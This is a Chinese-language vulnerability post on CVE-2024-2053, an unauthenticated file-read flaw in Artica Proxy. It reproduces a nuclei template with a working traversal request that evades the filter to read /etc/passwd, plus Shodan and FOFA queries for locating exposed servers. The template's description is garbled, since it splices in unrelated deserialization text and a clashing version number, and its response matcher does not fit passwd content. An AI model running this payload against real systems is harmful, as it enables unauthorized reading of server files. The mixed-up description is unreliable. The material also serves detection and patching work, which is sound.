Artica Proxy Unauthenticated LFI Vulnerability

漏洞信息

漏洞名称: Artica Proxy Unauthenticated LFI Vulnerability

漏洞编号:

  • CVE: CVE-2024-2053

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: Artica Proxy是一款广泛使用的代理服务器管理软件,主要用于企业级网络环境中,提供Web代理、邮件代理等服务。其管理界面通常部署在内网,供管理员进行配置和监控。该软件因其易用性和功能性在中小型企业中较为流行。此次发现的漏洞属于未授权文件读取漏洞,技术根源在于Artica Proxy的管理Web应用未能正确验证用户输入,导致攻击者可以构造特殊的请求绕过本地文件包含保护机制,进而读取服务器上的任意文件。具体而言,攻击者可以通过发送特制的HTTP请求,利用images.listener.php文件中的漏洞,实现目录穿越,访问系统敏感文件如/etc/passwd。由于该漏洞无需认证即可利用,攻击者可以远程获取服务器上的敏感信息,可能导致进一步的权限提升或其他恶意操作。此漏洞的CVSS评分为7.5,属于高危漏洞,对使用受影响版本Artica Proxy的企业构成了严重的安全威胁。

产品厂商: articatech

产品名称: artica_proxy

影响版本: 4.40

搜索语法: http.html:”artica” OR body=”artica”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/36ec6789784a4af0d9466b12d5255651e1875253/http%2Fcves%2F2024%2FCVE-2024-2053.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

id: CVE-2024-2053

info:
  name: Artica Proxy  - Unauthenticated LFI
  author: pussycat0x
  severity: high
  description: |
    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-2053
    cwe-id: CWE-23
    epss-score: 0.00434
    epss-percentile: 0.61897
    cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
  tags: cve,cve2024,lfi,artica,proxyfile-disclosure

http:
  - raw:
      - |
        GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Artica Proxy Unauthenticated LFI Vulnerability
http://example.com/2025/07/30/github_3193824094/
作者
lianccc
发布于
2025年7月30日
许可协议